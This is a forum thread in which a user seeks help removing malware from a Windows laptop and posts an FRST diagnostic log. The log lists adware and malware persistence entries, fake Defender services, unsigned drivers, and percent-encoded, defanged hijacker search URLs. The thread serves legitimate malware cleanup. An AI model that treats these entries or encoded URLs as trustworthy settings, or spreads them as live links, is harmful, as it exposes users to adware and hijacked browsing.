[RESOLVED] IE keeps popping and fake folders on drive C:\
Page 1 of 3 123 LastLast
Results 1 to 15 of 31

Thread: [RESOLVED] IE keeps popping and fake folders on drive C:\

  1. #1
    Join Date
    Jul 2008
    Posts
    232

    Resolved [RESOLVED] IE keeps popping and fake folders on drive C:\

    Hello masters!

    I've run a free Total AV quick and full scan and resolves at least 30 threats. But open restart, there are fake folders popping on C:\ and IE keeps popping crazy. Please help to clean my laptop. Here are the logs:

    FRST

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 6.02.2019
    Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (09-02-2019 00:59:59)
    Running from C:\Users\Thomazing!\Downloads
    Loaded Profiles: Thomazing! (Available Profiles: Thomazing!)
    Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
    Default browser: IE
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    () C:\ProgramData\Logic Cramble\set.exe
    (Google Inc.) C:\ProgramData\localNETService\localNETService.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (TotalAV) C:\Program Files (x86)\TotalAV\SecurityService.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
    (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    (J4K6ZYTM) C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
    () C:\Program Files (x86)\Multitimer\Multitimer.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (J4K6ZYTM) C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe
    ( ) C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe
    () C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
    (TotalAV) C:\Program Files (x86)\TotalAV\TotalAV.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM-x32\...\Run: [Multitimer] => C:\Program Files (x86)\Multitimer\Multitimer.exe [281600 2017-12-12] () <==== ATTENTION
    HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DiskWMpower\DiskPower.exe"
    HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1708016 2019-02-06] (Google LLC -> Google Inc.)
    HKLM\...\RunOnce: [OMEWPRODUCT_7FCEM] => C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe [236032 2019-02-08] (J4K6ZYTM) <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8222286] => "C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr\iastcgr31fm.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [WK27HXJEIFMX6EE] => "C:\Program Files\200OTU5ILR\200OTU5IL.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8735117] => "C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm\ncu5cze5p50.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [T9KTUNJFV82076N] => "C:\Program Files\1TH7OLWWNG\1TH7OLWWN.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CloudNet] => C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-08] (EpicNet Inc.) <==== ATTENTION
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9428290] => "C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy\ubd1dkxuekl.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [U943W0QT19CB97H] => "C:\Program Files\J7CMVSXGZX\J7CMVSXGZ.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [3525589] => "C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4\bqedsdhpytd.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [URD8WCW2ZCRHWKK] => "C:\Program Files\RQIX2K7UEC\RQIX2K7UE.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [NNHJYS7S607ZBCR] => "C:\Program Files\0JJM5TTRFB\IBKXK5Q0P.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9236653] => "C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce\zrxkioireze.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8581968] => "C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2\lihriqawtkv.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [44K3AH7DLU628F4] => "C:\Program Files\E1WSWX87LG\BIX8CZGTD.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [H82B1SB6W40C6YU] => C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe [850944 2019-02-09] (J4K6ZYTM)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [5608956] => C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe [1277549 2019-02-09] ( )
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
    HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    GroupPolicy: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
    Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.43.1

    Internet Explorer:
    ==================
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-bFEwE5S0xnXgWxUsARdsrsiNM_BcRR6VIUgHwYSXwHh7Ffv8ygm0uKm7dXNxCM7Ay7BGUULgFL93oS9c_xJL13HFJx
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)

    FireFox:
    ========
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)

    Chrome:
    =======
    CHR DefaultSearchURL: Default -> hxxps://feed.bazzsearch.com/?fext=true&publisherid=51206&publisher=defaultbazz&st=ed&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> Bazz Search
    CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-09]
    CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
    CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
    CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
    CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
    CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
    CHR Extension: (Flower Power) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
    CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
    CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
    CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
    CHR Extension: (Bazz Search) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-09]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
    CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
    CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
    CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-02-07] () [File not signed] <==== ATTENTION
    R2 localNETService; C:\ProgramData\localNETService\localNETService.exe [1905784 2019-02-08] (CONVERSION MAGIC LTD -> Google Inc.)
    R2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [4429264 2018-12-06] (Protected Antivirus Limited -> TotalAV)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
    R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
    R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)
    R2 NWQxNTAzNz; rundll32.exe C:\Windows\bxetfbicyncsflqei.bxetf IQQV [X]

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R1 B62CD2D3FFB1; C:\Windows\B62CD2D3FFB1.sys [621928 2019-02-08] (韵羽健康管理咨询(上海)有限公司 -> VxDriver)
    S3 bcmfn2; C:\Windows\System32\drivers\bcmfn2.sys [17624 2015-06-18] (Broadcom Corporation -> Windows (R) Win 7 DDK provider)
    R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
    S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
    S0 nvraid; C:\Windows\System32\drivers\nvraid.sys [150368 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
    S0 nvstor; C:\Windows\System32\drivers\nvstor.sys [166240 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
    R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
    S0 SiSRaid2; C:\Windows\System32\drivers\SiSRaid2.sys [44896 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems Corp.)
    S0 SiSRaid4; C:\Windows\System32\drivers\sisraid4.sys [81760 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems)
    R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
    S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
    S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
    R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-08] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One month (created) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-09 13:22 - 2019-02-09 00:52 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
    2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
    2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
    2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
    2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
    2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
    2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
    2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
    2019-02-09 00:59 - 2019-02-09 01:01 - 000020986 _____ C:\Users\Thomazing!\Downloads\FRST.txt
    2019-02-09 00:59 - 2019-02-09 00:59 - 000000000 ____D C:\FRST
    2019-02-09 00:58 - 2019-02-09 00:59 - 002433536 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
    2019-02-09 00:43 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files\OTIZAMD5IS
    2019-02-09 00:43 - 2019-02-09 00:43 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
    2019-02-09 00:43 - 2019-02-09 00:43 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
    2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
    2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
    2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
    2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
    2019-02-08 23:11 - 2019-02-08 23:11 - 000000000 ____D C:\Users\Thomazing!\Documents\TotalAV
    2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
    2019-02-08 23:09 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files (x86)\TotalAV
    2019-02-08 23:09 - 2019-02-08 23:09 - 000001089 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TotalAV.lnk
    2019-02-08 23:09 - 2019-02-08 23:09 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\TotalAV
    2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
    2019-02-08 23:02 - 2019-02-08 23:02 - 000003936 _____ C:\Windows\System32\Tasks\CCleaner Update
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
    2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
    2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
